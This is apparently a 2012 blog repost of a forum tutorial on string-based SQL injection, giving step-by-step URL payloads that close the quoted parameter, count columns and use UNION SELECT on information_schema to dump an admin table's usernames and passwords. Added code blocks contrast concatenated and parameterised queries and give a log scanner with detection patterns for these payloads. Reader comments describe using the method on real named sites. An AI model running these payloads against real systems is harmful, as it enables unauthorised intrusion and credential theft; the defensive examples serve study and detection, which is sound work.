Thursday, March 1, 2012

String Based SQL injection

Tutorial by Zer0Freak
Difficulty: Easy
Requirements: 10 minutes of reading time, patience and intuition
Previous Chapters:
Chapter1: http://www.hackforums.net/showthread.php?tid=2059771
Chapter2: http://www.hackforums.net/showthread.php?tid=2060211
Chapter3: http://www.hackforums.net/showthread.php?tid=2061628
Chapter4: http://www.hackforums.net/showthread.php?tid=2085773

Alright, since my previous tutorials haven't had as many responses as I expected, due to people who aren't fond of reading big tutorials, I've decided I won't make this tutorial big. As a matter of fact, I'll just make you understand the concepts behind String Based SQL injection. I KNOW there are a lot of tutorials that would be the same as this one, but I guarantee that if you read this, you won't have any doubts about String Based.




What is String Based SQL injection, and how do you notice it?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results that should be displayed after executing our SQLi query. This happens because the parameter is placed inside a quoted string in the site's query, so anything appended to it is read as part of that string value rather than as SQL.
Common signs that a site is vulnerable to String Based injection are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site will show a normal page even though it is vulnerable to SQLi)



Solution to this issue with String Based SQL injection
The answer to this problem is to use the following format in the query:
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
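The point here is that we used the quote ' and the + sign in our query: the quote closes the string that the parameter sits in, and the + is decoded as a space, which follows the -- comment marker so that the rest of the original query is ignored.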
Code:
id=X' order by--+
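
Why the quote matters, and what removes the problem, as an added example that is not part of the original tutorial: the same lookup built by string concatenation and with a bound parameter, both fed the `order by 1000` probe shown above. SQLite (Python's built-in `sqlite3`) stands in for the site's database, and the `pages` table and all function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the table behind index.php?id=...
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id TEXT, title TEXT, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                   [("10", "Home", "welcome"), ("11", "About", "about us")])
    return db

def lookup_vulnerable(db, page_id):
    # The value is pasted between quotes: a quote inside page_id ends the
    # string literal and everything after it is parsed as SQL.
    sql = "SELECT title, body FROM pages WHERE id = '" + page_id + "'"
    return db.execute(sql).fetchall()

def lookup_safe(db, page_id):
    # Bound parameter: page_id is only ever compared as a value and can
    # never change the structure of the statement.
    return db.execute("SELECT title, body FROM pages WHERE id = ?",
                      (page_id,)).fetchall()

def probe(lookup, page_id):
    # Report either the number of rows returned or the database error.
    db = make_db()
    try:
        return ("rows", len(lookup(db, page_id)))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))

# A "+" in the URL reaches the application as a space.
UNQUOTED = "10 order by 1000-- "   # stays inside the string: no SQL error
QUOTED = "10' order by 1000-- "    # closes the string: ORDER BY is parsed

def run_all():
    return {
        "concatenated, id=10": probe(lookup_vulnerable, "10"),
        "concatenated, unquoted probe": probe(lookup_vulnerable, UNQUOTED),
        "concatenated, quoted probe": probe(lookup_vulnerable, QUOTED),
        "bound parameter, quoted probe": probe(lookup_safe, QUOTED),
    }

if __name__ == "__main__":
    for name, result in run_all().items():
        print(f"{name}: {result}")
```

Only the concatenated query reacts to the quoted probe with a database error; with the bound parameter the same input is an id that matches nothing.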

Alright, now that you've got the point, let's try String Based on some of the other types of SQL injection, shall we?


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
The results show an error, so we'll assume 10 columns for this example

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3. Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4. Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5. Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can also be done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based
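
From the defender's side, the requests in steps 1 to 5 leave a recognisable trace in web server access logs. The following added example (not from the original tutorial) decodes each query string and flags the shapes used above; the log lines are constructed, and the rule names and the two-rule threshold are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2012:10:00:01 +0000] "GET /index.php?id=234 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Mar/2012:10:00:04 +0000] "GET /search.php?q=O%27Reilly+order+by+date HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Mar/2012:10:02:11 +0000] "GET /index.php?id=234%27+order+by+11--+ HTTP/1.1" 500 312',
    '203.0.113.9 - - [01/Mar/2012:10:02:40 +0000] "GET /index.php?id=-234%27+UNION+SELECT+1,2,3+from+information_schema.schemata--+ HTTP/1.1" 200 6001',
]

# Request target and response status from a combined-format log line.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')

# Each rule is applied to the URL-decoded parameter value, not the raw line,
# so %27 and + encodings cannot hide the quote or the spaces.
RULES = {
    "quote-then-sql": re.compile(r"'\s*(order\s+by|group\s+by|having|union|and|or)\b", re.I),
    "order-by-number": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-enumeration": re.compile(r"\binformation_schema\.", re.I),
    "trailing-comment": re.compile(r"(--|#)\s*$"),
}

def scan_line(line):
    """Return client, status and matched rule names, or None if unparsable."""
    m = REQUEST.search(line)
    if m is None:
        return None
    hits = set()
    query = urlsplit(m.group(1)).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        hits.update(rule for rule, rx in RULES.items() if rx.search(value))
    return {"client": line.split()[0], "status": int(m.group(2)), "rules": sorted(hits)}

def suspicious(lines, threshold=2):
    """Keep requests matching at least `threshold` rules to limit false positives."""
    records = (scan_line(line) for line in lines)
    return [r for r in records if r and len(r["rules"]) >= threshold]

if __name__ == "__main__":
    for rec in suspicious(SAMPLE_LOG):
        print(rec["client"], rec["status"], ", ".join(rec["rules"]))
```

The `O'Reilly` search is deliberately included: it contains a quote and the words "order by" but matches no rule, while the requests shaped like steps 1 and 2 match three and four.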




This will be considered as a mini tutorial for String Based SQL injection. I just hope people are gonna understand this as much as they're on their journey through SQL injection
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi
End of Chapter 5
Upcoming Chapter: Blind Based SQL Injection Detailed
Contact me via PM
or
Email: zerofreak@live.com
Have a great day

49 comments:

  1. Awesome tut
    http://iftikharcomputerworld.blogspot.com/

  2. zer0 please i sqlid a site but when i tried logging in with the admin details i had it refused to login
    the site is
    http://www.boydsmiths.in

  3. how if target is wordpress, i'd try with havij but it isn't working

  4. this article is a good booster to my hacking skills. i really liked your article
    Born 2 hack

  6. I enjoy long and detailed tutorials, and would like to see more.
    thanks very much

  7. Bro, where is your next tutorial? really a super tutorial. for your kind information, your chapter 4 doesn't work.
